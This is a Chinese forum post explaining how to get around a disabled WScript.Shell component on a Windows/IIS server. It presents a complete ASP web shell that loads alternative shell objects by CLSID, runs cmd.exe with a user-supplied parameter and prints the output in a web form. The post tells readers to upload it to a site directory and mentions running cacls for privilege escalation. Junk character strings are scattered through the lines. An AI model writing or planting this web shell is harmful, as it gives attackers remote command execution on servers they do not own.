wscript.shell删除解决办法

admin

可能有很多人，看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
7 J  j8 o; f* w4 H一般当闭上面组件时，你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
$ y+ s5 I; q  V' o; D8 l3 p要想让运行命令可以试试这种方法，成功率为五五之数。
把下面代码复制：
/ S0 O! _" p% z0 [, K2 [, T<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
0 I- E9 S% {) x* @<%if err then%>
; d2 ~; P5 E( w) K3 _" Y& w# ]. j<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
- [1 R, S0 e1 E) A+ t, A" K( H<%
end if
, }- C% |0 `+ X6 g2 A% G4 z2 H0 Mresponse.write("<textarea readonly cols=80 rows=20>")
& G9 i, b& U0 q- ~8 R2 Q% U, o  B8 MOn Error Resume Next
response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
+ e$ @9 ~; N% c) V7 x. Eresponse.write("</textarea>")
* \" G* g9 a& f9 n& e7 ]6 q  xresponse.write("<form method='post'>")
# l4 x: I! k( b3 gresponse.write("<input type=text name='c' size=60><br>")
response.write("<input type=submit value='执行'></form>")
6 a2 b- o7 g8 F+ G%>
( \5 O" b2 d+ |9 {
保存为一个asp文件，然后传到网站目录上去
运行的时候可能会出现两个问题，第一是运行了为什么运行不了命令，这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
5 ?4 E8 w+ f3 x. g我用此成功运行过cacls命令。
& z/ _' B( }8 o4 x& H
第二那就是运行时出错，可能限制某些代码执行